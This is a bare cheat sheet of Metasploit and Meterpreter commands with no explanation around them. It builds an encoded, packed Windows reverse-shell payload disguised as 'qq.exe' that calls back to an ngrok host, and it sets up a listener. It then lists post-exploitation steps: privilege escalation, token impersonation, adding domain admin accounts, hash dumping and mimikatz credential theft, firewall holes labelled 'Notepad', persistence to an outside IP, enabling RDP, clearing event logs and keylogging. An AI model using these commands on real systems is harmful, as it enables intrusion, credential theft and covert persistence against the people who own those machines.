meterpreter Command Sample
meterpreter Command Sample
================================================================================================== msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 12 -b '\x00' LHOST=free.ngrok.cc LPORT=10678 -f c msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 12 -b '\x00' LHOST=free.ngrok.cc LPORT=10678 -f exe -o qq.exe upx -5 qq.exe -k ================================================================================================== msfconsole use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 192.168.195.45 set lport 10678 set ExitOnSession false set AutorunScript post/windows/manage/smart_migrate exploit -j -z jobs sessions -i 1 sysinfo screenshot getuid getsystem getuid run post/windows/manage/priv_migrate background ps steal_token PID drop_token getuid use incognito help incognito list_tokens -u list_tokens -g impersonate_token DOMAIN_NAME\USERNAME add_user domainuser password -h 192.168.195.191 add_group_user "Domain Admins" domainuser -h 192.168.195.191 run post/windows/gather/smart_hashdump # http://www.objectif-securite.ch/en/ophcrack.php use mimikatz help mimikatz msv ssp kerberos wdigest mimikatz_command -f samdump::hashes mimikatz_command -f sekurlsa::searchPasswords run post/windows/gather/checkvm run post/windows/gather/enum_applications run post/windows/gather/dumplinks run post/windows/gather/usb_history run post/windows/gather/enum_devices execute -f cmd.exe -i -H -t net user username userpass /add net localgroup "Administrators" username /add net user domainuser userpass /add /DOMAIN net group "Domain Admins" domainuser /add /DOMAIN netsh firewall add portopening TCP 10678 "Notepad" ENABLE ALL netsh firewall add portopening TCP 19655 "Notepad" ENABLE ALL exit run metsvc run persistence -X -i 10 -p 10678 -r 47.90.92.56 run post/windows/manage/enable_rdp run getgui -e run getgui -u username -p userpass # rdesktop -u username -p userpass server[:port] clearev run post/windows/capture/keylog_recorder ==================================================================================================